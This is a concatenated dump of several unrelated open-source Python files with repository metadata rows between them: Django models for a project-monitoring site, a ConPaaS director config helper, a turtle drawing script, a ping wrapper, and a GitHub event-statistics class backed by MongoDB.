('MI', _('Project Progress / Execution / Milestone')),
('CI', _('Action by Civil Society')),
('UE', _('Unplanned Event')),
('SE', _('Miscellaneous')),
)
EVENT_TYPE_CHOICES_ICONS = {
'ME': 'icon-calendar',
'IN': 'icon-info-sign',
'MI': 'icon-wrench',
'CI': 'icon-bullhorn',
'UE': 'icon-bolt',
'SE': 'icon-asterisk',
}
title = models.CharField(_("Title"), max_length=250)
event_type = models.CharField(_("Type"), max_length=2, choices=EVENT_TYPE_CHOICES)
help_text = _("Event being of central importance for the project.")
important = models.BooleanField(_("Main Event"), default=False, help_text=help_text)
search_tags = GenericRelation('SearchTag')
description = models.TextField(_("Description"))
date = models.DateField(_("Date"))
help_text = _("Date is not exact (e.g. if a source refers only to the month)")
not_exact = models.BooleanField(_("Date not exact"), default=False, help_text=help_text)
participants = models.ManyToManyField(Participant, related_name="related_events", blank=True, verbose_name=_("Participants"))
project_parts = models.ManyToManyField(ProjectPart, related_name="related_events", blank=True, verbose_name=_("Topics"))
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
str = self.title + ", "
if self.not_exact:
str += '('
str += datetime.strftime(self.date, '%d.%m.%Y')
if self.not_exact:
str += ')'
return str
def get_feed_description(self):
html = self.description
if len(self.participants.all()) > 0:
html += '<br><br>'
html += _("Participants") + ':'
for p in self.participants.all():
html += '<br><a href="' + p.get_absolute_url() + '">' + unicode(p) + '</a>'
if len(self.project_parts.all()) > 0:
html += '<br><br>'
html += _("Subject Areas") + ':'
for pp in self.project_parts.all():
html += '<br><a href="' + pp.get_absolute_url() + '">' + unicode(pp) + '</a>'
return html
def get_absolute_url(self):
return "/" + ugettext("events_url") + slugify(self.date.strftime('%Y-%m-%d') + '-' + self.title) + '-' + unicode(self.id) + "/"
def get_event_type_icon(self):
return self.EVENT_TYPE_CHOICES_ICONS[self.event_type]
def get_comments_url(self):
return "/" + ugettext("events_url") + unicode(self.id) + "/" + ugettext("comments_url")
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
@classmethod
def get_color(cls):
return '#c91a1a'
@classmethod
def get_icon_class(cls):
return 'icon-time'
def get_simple_entry(self):
html = '<i class="' + self.get_icon_class() + '"></i> '
html += '<a href="' + self.get_absolute_url() +'">' + self.title + '</a>'
return html
def as_list(self):
return [self,]
class Meta:
ordering = ['-date']
verbose_name = _('Event')
verbose_name_plural = _('Events')
class Question(models.Model):
help_text = _("Title/short version of the question. Use prefix (e.g. 1,2,3 or A1,A2,A3) to sort questions")
title = models.CharField(_("Title"), max_length=250, help_text=help_text)
answered = models.BooleanField(_("Answered"), default=False)
help_text = _("Description/long version of the question.")
description = models.TextField(_("Description"), help_text=help_text)
project_parts = models.ManyToManyField(ProjectPart, related_name="related_questions", blank=True, verbose_name=_("Topics"))
participants = models.ManyToManyField(Participant, related_name="related_questions", blank=True, verbose_name=_("Participants"))
events = models.ManyToManyField(Event, related_name="related_questions", blank=True, verbose_name=_("Events"))
help_text = _("Optional explanations or remarks around the question")
explanations = models.TextField(_("Explanations"), blank=True, help_text=help_text)
help_text = _("Optional answer (summary) of a question")
answer = models.TextField(_("Answer"), blank=True, help_text=help_text)
documents = models.ManyToManyField('Document', related_name="related_documents", blank=True, verbose_name=_("Documents"))
web_sources = GenericRelation(WebSource)
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def get_feed_description(self):
html = self.description
if len(self.project_parts.all()) > 0:
html += '<br><br>'
html += _("Subject Areas") + ':'
for pp in self.project_parts.all():
html += '<br><a href="' + pp.get_absolute_url() + '">' + unicode(pp) + '</a>'
if len(self.participants.all()) > 0:
html += '<br><br>'
html += _("Participants") + ':'
for p in self.participants.all():
html += '<br><a href="' + p.get_absolute_url() + '">' + unicode(p) + '</a>'
if len(self.events.all()) > 0:
html += '<br><br>'
html += _("Events") + ':'
for e in self.events.all():
html += '<br><a href="' + e.get_absolute_url() + '">' + unicode(e) + '</a>'
return html
def get_absolute_url(self):
return "/" + ugettext("questions_url") + slugify(self.title) + '-' + unicode(self.id) + "/"
def get_comments_url(self):
return "/" + ugettext("questions_url") + unicode(self.id) + "/" + ugettext("comments_url")
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
@classmethod
def get_color(cls):
return '#941bbf';
@classmethod
def get_icon_class(cls):
return 'icon-question-sign';
def __unicode__(self):
return self.title
class Meta:
ordering = ['title']
verbose_name = _('Question')
verbose_name_plural = _('Questions')
class ProjectGoalGroupManager(models.Manager):
def get_current(self):
if self.count() > 0:
return self.all().order_by('event')[0]
else:
return None
class ProjectGoalGroup(models.Model):
help_text = _("Group of project goals being determined at a certain point in time.")
title = models.CharField(_("Title"), max_length=250, help_text=help_text)
help_text = _("The topic the group of goals belong to. Will be shown as common goal group if none selected.")
project_part = models.ForeignKey(ProjectPart, blank=True, null=True, verbose_name=_("Topic"))
event = models.ForeignKey(Event, verbose_name=_("Associated event"))
is_current = models.BooleanField(default=True, verbose_name=_("Is current"))
help_text = _("Description of the group of project goals.")
description = models.TextField(_("Description"), help_text=help_text)
comments = models.TextField(_("Comments (internal)"), blank=True)
objects = ProjectGoalGroupManager()
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.title
class Meta:
verbose_name = _('Goal')
verbose_name_plural = _('Goals')
class ProjectGoal(models.Model):
help_text = _("Name, e.g. 'Project budget', 'Target date', 'Noise level'")
name = models.CharField(_("Name"), max_length=250, help_text=help_text)
project_goal_group = models.ForeignKey(ProjectGoalGroup)
help_text = _("Single performance figure describing the project goal, e.g. '1.000.000 Euro', 'January 25th 2020', ...")
performance_figure = models.CharField(_("Performance figure"), max_length=250, help_text=help_text)
help_text = _("Use integer numbers for ordering (e.g. '100', '200', '300').")
order = models.IntegerField(_("Order"), help_text=help_text, default=100, blank=True, null=True)
def __unicode__(self):
return self.name
class Meta:
ordering = ['order',]
verbose_name = _('Goal Value')
verbose_name_plural = _('Goal Values')
class Document(models.Model):
help_text = _("Title of the document")
title = models.CharField(_("Title"), max_length=250, help_text=help_text)
help_text = _('Document in pdf format')
document = models.FileField(_("Document"), upload_to='documents', help_text=help_text)
help_text = _('Date of creation of the document')
date = models.DateField(_("Date"), help_text=help_text)
help_text = _("Short description.")
description = models.TextField(_("Description"), help_text=help_text)
participants = models.ManyToManyField(Participant, related_name="related_documents", blank=True, verbose_name=_("Participants"))
project_parts = models.ManyToManyField(ProjectPart, related_name="related_documents", blank=True, verbose_name=_("Topics"))
events = models.ManyToManyField(Event, related_name="related_documents", blank=True, verbose_name=_("Events"))
comment_relations = GenericRelation('CommentRelation')
comments = models.TextField(_("Comments (internal)"), blank=True)
pdf_images_generated = models.BooleanField(default=False)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.title + " (" + datetime.strftime(self.date, '%m/%d/%Y') + ")"
def get_feed_description(self):
html = self.description
if len(self.participants.all()) > 0:
html += '<br><br>'
html += _("Participants") + ':'
for p in self.participants.all():
html += '<br><a href="' + p.get_absolute_url() + '">' + unicode(p) + '</a>'
if len(self.project_parts.all()) > 0:
html += '<br><br>'
html += _("Subject Areas") + ':'
for pp in self.project_parts.all():
html += '<br><a href="' + pp.get_absolute_url() + '">' + unicode(pp) + '</a>'
if len(self.events.all()) > 0:
html += '<br><br>'
html += _("Events") + ':'
for e in self.events.all():
html += '<br><a href="' + e.get_absolute_url() + '">' + unicode(e) + '</a>'
return html
def get_absolute_url(self):
return "/" + ugettext("documents_url") + slugify(self.title) + '-' + unicode(self.id) + "/"
def get_comments_url(self):
return "/" + ugettext("documents_url") + unicode(self.id) + "/" + ugettext("comments_url")
@classmethod
def get_color(cls):
return '#b88f00';
@classmethod
def get_icon_class(cls):
return 'icon-inbox';
def get_document_name(self):
return os.path.basename(self.document.name)
def get_pages_path(self):
return os.path.join(settings.MEDIA_ROOT, 'documents/document_' + unicode(self.id) + '/')
def get_active_user_comments(self):
return self.comment_relations.filter(comment__published=True)
def get_num_active_user_comments(self):
return self.comment_relations.filter(comment__published=True).count()
class Meta:
ordering = ['-date_added']
verbose_name = _('Document')
verbose_name_plural = _('Documents')
def __init__(self, *args, **kwargs):
super(Document, self).__init__(*args, **kwargs)
self.old_document = self.document
def save(self, force_insert=False, force_update=False):
if getattr(settings, 'DPP_IE_COMPATIBLE_PDF_VIEWER', True) and self.old_document != self.document:
self.pdf_images_generated = False
else:
self.pdf_images_generated = True
super(Document, self).save(force_insert, force_update)
#print "pdf_images_generated set to: " + str(self.pdf_images_generated)
# Delete old document
if self.old_document and self.old_document != self.document:
if os.path.exists(self.old_document.path):
os.remove(self.old_document.path)
#print "Old document deleted from path: " + self.old_document.path
if self.old_document != self.document:
cmd = u"python manage.py createpages " + str(self.id) + " --settings=" + settings.SETTINGS_MODULE
subprocess.Popen(cmd, shell=True)
#print "New page creation process started..."
# Creating images when DPP_IE_COMPATIBLE_PDF_VIEWER=True in settings.py
if getattr(settings, 'DPP_IE_COMPATIBLE_PDF_VIEWER', True) and self.old_document != self.document:
cmd = u"python manage.py generatepdfimages " + str(self.id) + " --settings=" + settings.SETTINGS_MODULE
subprocess.Popen(cmd, shell=True)
#print "Image generation process started..."
self.old_document = self.document
def delete_pages_folder(sender, **kwargs):
instance = kwargs['instance']
if os.path.exists(instance.get_pages_path()):
shutil.rmtree(instance.get_pages_path())
def delete_document_file(sender, **kwargs):
instance = kwargs['instance']
if instance.document and os.path.exists(instance.document.path):
os.remove(instance.document.path)
pre_delete.connect(delete_pages_folder, sender=Document)
pre_delete.connect(delete_document_file, sender=Document)
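# Lifecycle summary for Document files: saving with a changed file resets
# pdf_images_generated, deletes the previously stored file and spawns the
# `createpages` (and, when DPP_IE_COMPATIBLE_PDF_VIEWER is set, `generatepdfimages`)
# management commands; deleting a Document fires the two pre_delete handlers
# above to remove its pages folder and stored file.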
class Page(models.Model):
document = models.ForeignKey(Document)
number = models.IntegerField()
content = models.TextField(blank=True)
def get_filename(self):
return u'page-' + unicode(self.number) + u'.jpg'
def get_filepath(self):
return self.document.get_pages_path() + self.get_filename()
def __unicode__(self):
return unicode(self.document) + ", Page " + unicode(self.number)
class Meta:
ordering = ['number']
verbose_name = _('Page')
verbose_name_plural = _('Pages')
def delete_page_image(sender, **kwargs):
instance = kwargs['instance']
if os.path.exists(instance.get_filepath()):
os.remove(instance.get_filepath())
pre_delete.connect(delete_page_image, sender=Page)
class SearchTag(models.Model):
help_text = _("Documents containing these search tags are shown on the detail page of this object.")
name = models.CharField(_("Name"), max_length=250, help_text=help_text)
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey("content_type", "object_id")
order = models.IntegerField(_("Order"), default=100, blank=True, null=True)
date_added = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.name
class Meta:
ordering = ['order']
verbose_name = _('Search Tag')
verbose_name_plural = _('Search Tags')
@receiver(post_save, sender=SearchTag)
def rebuild_tag_cache(sender, instance, **kwargs):
from public_project.tag_cache_creator import rebuild_cache_for_tag
rebuild_cache_for_tag(instance)
class SearchTagCacheEntry(models.Model):
tag = models.ForeignKey(SearchTag)
document = models.ForeignKey(Document)
num_results = models.IntegerField()
def __unicode__(self):
return "Tag:" + unicode(self.tag) + ", Document:" + unicode(self.document)
class Meta:
ordering = ['-num_results']
RELATION_LIMIT = models.Q(app_label = 'public_project', model = 'projectpart') | \
models.Q(app_label = 'public_project', model = 'question') | \
models.Q(app_label = 'public_project', model = 'participant') | \
models.Q(app_label = 'public_project', model = 'event') | \
models.Q(app_label = 'public_project', model = 'document')
class ResearchRequestRelation(models.Model):
research_request = models.ForeignKey('ResearchRequest')
help_text = _('Type of the related object (ProjectPart, Question, Participant, Event, Document).')
limit = RELATION_LIMIT
content_type = models.ForeignKey(ContentType, help_text=help_text, limit_choices_to=limit)
help_text = _('The id of the related object (you can find the id of an object in the url \
of the object change form in the admin).')
object_id = models.PositiveIntegerField(help_text=help_text)
content_object = GenericForeignKey('content_type', 'object_id')
help_text = _("Page number in document")
page = models.IntegerField(_("Page"), blank=True, null=True, help_text=help_text)
def __unicode__(self):
return unicode(self.research_request) + ', ' + unicode(self.content_object)
class Meta:
verbose_name = _('Relation with Project Element')
verbose_name_plural = _('Relations with Project Elements')
class ResearchRequest(models.Model):
help_text = _('Give a unique number to your request so that people can reference it (e.g. "R1", "R2",...)')
nr = models.CharField(_("Nr"), max_length=8, help_text=help_text)
title = models.CharField(_("Title"), max_length=250)
open = models.BooleanField(_("Open"), default=True)
description = models.TextField(_("Description"))
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return unicode(self.nr) + ': ' + self.title
def get_feed_description(self):
html = self.description
html += '<br><br>'
html += _("Request on the following contents") + ':'
for rr_rel in self.researchrequestrelation_set.all():
html += '<br><a href="' + rr_rel.content_object.get_absolute_url() + '">' + unicode(rr_rel.content_object) + '</a>'
return html
def get_related_question(self):
question = None
content_type = ContentType.objects.get(app_label="public_project", model="question")
cos = self.researchrequestrelation_set.all()
for co in cos:
if co.content_type == content_type:
question = co.content_object
return question
def get_absolute_url(self):
return self.get_related_question().get_absolute_url() + '?research_request_id=' + unicode(self.id)
@classmethod
def get_color(cls):
return '#555';
@classmethod
def get_icon_class(cls):
return 'icon-eye-open';
def get_share_text(self):
short_title = 'ProjectWatch'
if SiteConfig.objects.count() > 0:
site_config = SiteConfig.objects.all()[0]
short_title = site_config.short_title
share_text = short_title + " " + unicode(_("Research Request")) + " " + self.nr + ": " + self.title
return share_text
def get_share_url(self):
share_url = 'http://%s%s' % (Site.objects.get_current().domain, self.get_absolute_url())
return share_url
def get_twitter_url(self):
url = 'https://twitter.com/intent/tweet'
url += '?&text=' + urlquote(self.get_share_text()) + '&url=' + urlquote(self.get_share_url())
return url
def get_facebook_url(self):
url = 'https://www.facebook.com/sharer.php'
url += '?&t=' + urlquote(self.get_share_text()) + '&u=' + urlquote(self.get_share_url())
return url
def get_google_plus_url(self):
url = 'https://plus.google.com/share'
url += '?url=' + urlquote(self.get_share_url())
return url
def get_app_net_url(self):
url = 'https://alpha.app.net/intent/post?text='
url += urlquote(self.get_share_text() + " " + self.get_share_url())
return url
class Meta:
ordering = ['-date_added']
verbose_name = _('Research Request')
verbose_name_plural = _('Research Requests')
class CommentRelation(models.Model):
comment = models.ForeignKey('Comment')
help_text = _('Type of the related object (ProjectPart, Question, Participant, Event, Document).')
limit = RELATION_LIMIT
content_type = models.ForeignKey(ContentType, help_text=help_text, limit_choices_to=limit)
help_text = _('The id of the related object (you can find the id of an object in the url \
of the object change form in the admin).')
object_id = models.PositiveIntegerField(help_text=help_text)
content_object = GenericForeignKey('content_type', 'object_id')
help_text = _("Page number in document")
page = models.IntegerField(_("Page"), blank=True, null=True, help_text=help_text)
def __unicode__(self):
return unicode(self.comment) + ', ' + unicode(self.content_object)
class Meta:
verbose_name = _('Relation with Project Element')
verbose_name_plural = _('Relations with Project Elements')
class Comment(models.Model):
username = models.CharField(_("Username"), max_length=250)
email = models.EmailField(_("Email"), max_length=250)
help_text = _('User has given permission to get in contact via email.')
feedback_allowed = models.BooleanField(_("Feedback allowed"), default=False, help_text=help_text)
comment = models.TextField(_("Comment text"))
help_text = _('Comment is only shown on page if published is true.')
published = models.BooleanField(_("Published"), default=False, help_text=help_text)
published_by = models.CharField(_("Published by"), max_length=250, blank=True)
activation_hash = models.CharField(_("Activation hash"), max_length=250, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.username + ", " + datetime.strftime(self.date_added, '%d.%m.%Y')
def get_feed_description(self):
html = self.comment
html += '<br><br>'
html += _("Commented contents") + ':'
for cr in self.commentrelation_set.all():
html += '<br><a href="' + cr.content_object.get_absolute_url() + '">' + unicode(cr.content_object) + '</a>'
return html
def get_absolute_url(self):
first_co = self.commentrelation_set.all()[0].content_object
return first_co.get_absolute_url() + '?comment_id=' + unicode(self.id)
@classmethod
def get_color(cls):
return '#555';
@classmethod
def get_icon_class(cls):
return 'icon-comment';
def get_share_text(self):
co1 = list(self.commentrelation_set.all())[0].content_object
short_title = 'ProjectWatch'
if SiteConfig.objects.count() > 0:
site_config = SiteConfig.objects.all()[0]
short_title = site_config.short_title
share_text = _('Comment on %s on') % short_title
share_text += ' "' + unicode(co1) + '"'
share_text += ":"
return share_text
def get_share_url(self):
share_url = 'http://%s%s' % (Site.objects.get_current().domain, self.get_absolute_url())
return share_url
def get_twitter_url(self):
url = 'https://twitter.com/intent/tweet'
url += '?&text=' + urlquote(self.get_share_text()) + '&url=' + urlquote(self.get_share_url())
return url
def get_facebook_url(self):
url = 'https://www.facebook.com/sharer.php'
url += '?&t=' + urlquote(self.get_share_text()) + '&u=' + urlquote(self.get_share_url())
return url
def get_google_plus_url(self):
url = 'https://plus.google.com/share'
url += '?url=' + urlquote(self.get_share_url())
return url
def get_app_net_url(self):
url = 'https://alpha.app.net/intent/post?text='
url += urlquote(self.get_share_text() + " " + self.get_share_url())
return url
class Meta:
ordering = ['-date_added']
verbose_name = _('Comment')
verbose_name_plural = _('Comments')
class ActivityLog(models.Model):
TYPE_CHOICES = (
('NA', _('New Subject Area')),
('NQ', _('New Question')),
('PA', _('New Participant')),
('NE', _('Event')),
('ND', _('New Document')),
('RR', _('Research Request')),
('NC', _('Comment')),
)
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
type = models.CharField(_("Type"), max_length=2, choices=TYPE_CHOICES)
info = models.CharField(_("Info"), max_length=250, blank=True)
date = models.DateTimeField(_("Date"), auto_now_add=True)
def __unicode__(self):
return u'Activity: ' + unicode(self.content_object)
class Meta:
ordering = ['-date']
verbose_name = _('Activity Log Entry')
verbose_name_plural = _('Activity Log')
@receiver(post_save, sender=ProjectPart)
def add_na_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='NA')
al.save()
@receiver(post_save, sender=Question)
def add_nq_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='NQ')
al.save()
@receiver(post_save, sender=Participant)
def add_pa_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='PA')
al.save()
@receiver(post_save, sender=Event)
def add_ne_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='NE')
al.save()
@receiver(post_save, sender=Document)
def add_nd_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='ND')
al.save()
@receiver(post_save, sender=ResearchRequest)
def add_rr_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='RR')
al.save()
| bsd-3-clause | -5,233,854,238,499,547,000 | 40.294686 | 172 | 0.621175 | false |
ConPaaS-team/conpaas | conpaas-director/cpsdirector/common.py | 1 | 1843 | from flask import request, make_response
import os
from pwd import getpwnam
from grp import getgrnam
from ConfigParser import ConfigParser
# TODO: why not use SafeConfigParser() ??
config_parser = ConfigParser()
CONFFILE = os.getenv('DIRECTOR_CFG')
if not CONFFILE:
CONFFILE = "/etc/cpsdirector/director.cfg"
# Config values for unit testing
if os.getenv('DIRECTOR_TESTING'):
CONFFILE = 'director.cfg.example'
config_parser.read(CONFFILE)
# from conpaas.core import https
# https.client.conpaas_init_ssl_ctx('/etc/cpsdirector/certs', 'director')
if os.getenv('DIRECTOR_TESTING'):
if not config_parser.has_section('iaas'):
config_parser.add_section('iaas')
if not config_parser.has_section('director'):
config_parser.add_section('director')
# dummy cloud
config_parser.set("iaas", "DRIVER", "dummy")
config_parser.set("iaas", "USER", "dummy")
# separate database
config_parser.set("director", "DATABASE_URI", "sqlite:///director-test.db")
config_parser.set("director", "DIRECTOR_URL", "")
# dummy data dir for manifests
config_parser.set("director", "USERDATA_DIR", "/tmp/")
def get_director_url():
return config_parser.get("director", "DIRECTOR_URL")
def get_userdata_dir():
return config_parser.get("director", "USERDATA_DIR")
def chown(path, username, groupname):
os.chown(path, getpwnam(username).pw_uid, getgrnam(groupname).gr_gid)
def log(msg):
try:
print >> request.environ['wsgi.errors'], msg
except RuntimeError:
print msg
def log_error(msg):
log('ERROR: %s' % msg)
def build_response(data):
response = make_response(data)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Connection'] = 'close'
return response
def error_response(message):
return { 'error': message }
| bsd-3-clause | 8,926,462,167,972,592,000 | 25.710145 | 79 | 0.687466 | false |
povellesto/blobygames | Blob Rage App/random/wg.py | 1 | 1147 | import turtle
#turtle.ht()
turtle.title("RWG")
turtle.speed(1)
def square():
turtle.forward(5)
turtle.left(90)
turtle.forward(5)
turtle.left(90)
turtle.forward(5)
turtle.left(90)
turtle.forward(5)
def window():
turtle.color("white")
turtle.begin_fill()
square()
turtle.end_fill()
def wooden_door():
turtle.color("brown")
turtle.begin_fill()
square()
turtle.left(270)
square()
square()
square()
square()
turtle.right(90)
turtle.forward(5)
square()
square()
turtle.end_fill()
def stone_door():
turtle.color("dark gray")
turtle.begin_fill()
square()
turtle.left(270)
square()
square()
square()
square()
turtle.right(90)
turtle.forward(5)
square()
square()
turtle.end_fill()
def wood():
turtle.color("brown")
turtle.begin_fill()
square()
turtle.end_fill()
def stone():
turtle.color("dark gray")
turtle.begin_fill()
square()
turtle.end_fill()
def wooden_house():
wooden_door()
wooden_house()
turtle.exitonclick() | unlicense | 648,242,123,662,026,400 | 14.306667 | 29 | 0.571927 | false |
ekorian/deploypl | deployer/ping.py | 1 | 2563 | """
ping.py
pinger module
@author: K.Edeline
"""
import re
import subprocess
_pingopt_count = "-c"
_pingopt_deadline = "-w"
_pingopt_quiet = "-q"
_pingopt_period = "-i"
regex1 = re.compile(r'PING ([a-zA-Z0-9.\-]+) \(')
regex2 = re.compile(r'(\d+) packets transmitted, (\d+) received')
regex3 = re.compile(r'(\d+.\d+)/(\d+.\d+)/(\d+.\d+)/(\d+.\d+)')
def ping_process(dipaddr, progname='ping', deadline=5, quiet=True, period=None, count=1):
"""
return a ping subprocess.Popen
"""
ping_argv = [progname]
if quiet:
ping_argv += [_pingopt_quiet]
if period is not None:
ping_argv += [_pingopt_period, str(period)]
if count is not None:
ping_argv += [_pingopt_count, str(count)]
if deadline is not None:
ping_argv += [_pingopt_deadline, str(deadline)]
ping_argv += [str(dipaddr)]
# Run subprocess
try:
p=subprocess.Popen(ping_argv, stdout=subprocess.PIPE)
except subprocess.CalledProcessError:
pass
return p
def ping_parse(ping_output):
"""
Parses the `ping_output` string into a dictionary containing the following
fields:
`host`: *string*; the target hostname that was pinged
`sent`: *int*; the number of ping request packets sent
`received`: *int*; the number of ping reply packets received
`minping`: *float*; the minimum (fastest) round trip ping request/reply
time in milliseconds
`avgping`: *float*; the average round trip ping time in milliseconds
`maxping`: *float*; the maximum (slowest) round trip ping time in
milliseconds
`jitter`: *float*; the standard deviation between round trip ping times
in milliseconds
"""
host = _get_match_groups(ping_output, regex1)[0]
sent, received = _get_match_groups(ping_output, regex2)
try:
minping, avgping, maxping, jitter = _get_match_groups(ping_output,
regex3)
except:
minping, avgping, maxping, jitter = ['NaN']*4
return {'host': host, 'sent': int(sent), 'received': int(received),
'minping': minping, 'avgping': avgping, 'maxping': maxping,
'jitter': jitter}
def _get_match_groups(ping_output, regex):
match = regex.search(ping_output)
if not match:
raise PingException('Non standard ping output:\n' + ping_output)
return match.groups()
class PingException(Exception):
"""
PingException(Exception)
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
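# Minimal usage sketch: chains ping_process() and ping_parse(). It assumes an
# iputils-style `ping` binary on PATH and a reachable target; the host below is
# only an example.
if __name__ == "__main__":
   proc = ping_process("127.0.0.1", count=2, deadline=5)
   out, _ = proc.communicate()
   stats = ping_parse(out.decode("utf-8", "replace"))
   print(stats)  # e.g. {'host': '127.0.0.1', 'sent': 2, 'received': 2, ...}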
| bsd-3-clause | 7,018,626,121,032,329,000 | 27.477778 | 89 | 0.616855 | false |
knightsamar/github-edu-effectiveness | event_utils.py | 1 | 10612 | from store import connect
from github import Github, NamedUser
from settings import COURSE_REPO, COURSE_REPO_NAME
class GitHubEventsInfo(object):
username = None
commits_made = None
pull_requests_made = None
forks_created = None
issues_created = None
issues_resolved = None
repositories_created = None
def __init__(self, username):
if type(username) is unicode or type(username) is str:
u = Github().get_user(username) #verify that such user exists on Github
if u is not None:
self.username = username
else:
raise Exception("No such user exists on Github currently! Aborting!")
elif type(username) is NamedUser.NamedUser:
self.username = username.login
else:
raise Exception("Not a valid username!")
print "Username :", self.username
def get_commits_made(self):
'''
Gives back:
number of commits made on the course repo
number of commits made on the course repo's fork
number of commits made on other repos before the course started
number of commits made on other repos after the course ended
'''
#TODO: Further filter the commits on other repos based on date.
#get data
db = connect()
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'PushEvent',
})
on_course_repo_fork = db.events.find({
'actor.login' : self.username,
'repo.name' : '%s/%s' % (self.username, COURSE_REPO_NAME),
'type' : 'PushEvent',
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'PushEvent',
})
#store data
self.commits_made = {}
self.commits_made['on_course_repo'] = {
'pushes' : on_course_repo.count(), #total pushes
'commits' : sum([push['payload']['size'] for push in on_course_repo],0), #sum total of commits in each push
'repos' : on_course_repo.distinct('repo.name')
}
self.commits_made['on_course_repo_fork'] = {
'pushes' : on_course_repo_fork.count(),
'commits' : sum([push['payload']['size'] for push in on_course_repo_fork],0),
'repos' : on_course_repo_fork.distinct('repo.name'),
}
self.commits_made['on_other_repos'] = {
'pushes' : on_other_repos.count(),
'commits' : sum([push['payload']['size'] for push in on_other_repos],0),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.commits_made
#TODO: Further filter the pull requests on other repos based on date.
def get_pull_requests_made(self):
'''
Gives back:
number of pull requests made on the course repo
number of pull requests made on the course repo's fork
number of pull requests made on other repos before the course started
number of pull requests made on other repos after the course ended
'''
#get data
db = connect()
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO, #TODO: Figure out why repo.full_name doesn't work here!
'type' : 'PullRequestEvent',
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'PullRequestEvent',
})
#store data
self.pull_requests_made = {}
self.pull_requests_made['on_course_repo'] = {
'count' : on_course_repo.count(), #total pull requests
'repos' : on_course_repo.distinct('repo.name')
}
self.pull_requests_made['on_other_repos'] = {
'count' : on_other_repos.count(),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.pull_requests_made
#TODO: GET AND STORE all get_forks() data for all users in a forks collection in MongoDB and use it here.
#TODO: Further filter the forks based on date.
def get_forks_created(self):
'''
get the details of any forks that were created by the user of
the course repo
other repos before the course started
other repos after the course ended
'''
#get data
db = connect()
of_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'ForkEvent',
})
of_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$ne' : COURSE_REPO},
'type' : 'ForkEvent',
})
#store data
self.forks_created = {}
self.forks_created['of_course_repo'] = {
'count' : of_course_repo.count(), #total forks created -- I know this weird but it is 0400 hrs and I hv more imp things in code to worry about
'fork_of' : of_course_repo.distinct('repo.name')
}
self.forks_created['of_other_repos'] = {
'count' : of_other_repos.count(), #total forks created
'fork_of' : of_other_repos.distinct('repo.name')
}
return self.forks_created
def get_issues_created(self):
'''
Gets the details of any issues OPENED or REOPENED by the user on
1. the course repo
2. fork of the course repo
3. other repos before the course started
4. other repos after the course ended
'''
#TODO: Further filter the issues based on date as required by 3) and 4) above
db = connect()
#get data
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'IssuesEvent',
'payload.action': { '$in' : ['opened','reopened']},
})
on_course_repo_fork = db.events.find({
'actor.login' : self.username,
'repo.name' : '%s/%s' % (self.username, COURSE_REPO_NAME),
'type' : 'IssuesEvent',
'payload.action': { '$in' : ['opened','reopened']},
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'IssuesEvent',
'payload.action': { '$in' : ['opened','reopened']},
})
#store the data
self.issues_created = {}
self.issues_created['on_course_repo'] = {
'count' : on_course_repo.count(),
'repos' : on_course_repo.distinct('repo.name'),
}
self.issues_created['on_course_repo_fork'] = {
'count' : on_course_repo_fork.count(),
'repos' : on_course_repo_fork.distinct('repo.name'),
}
self.issues_created['on_other_repos'] = {
'count' : on_other_repos.count(),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.issues_created
def get_issues_resolved(self):
'''
Gets the details of any issues CLOSED by the user on
1. the course repo
2. fork of the course repo
3. other repos before the course started
4. other repos after the course ended
'''
#TODO: Further filter the issues based on date as required by 3) and 4) above
db = connect()
#get data
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'IssuesEvent',
'payload.action': 'closed',
})
on_course_repo_fork = db.events.find({
'actor.login' : self.username,
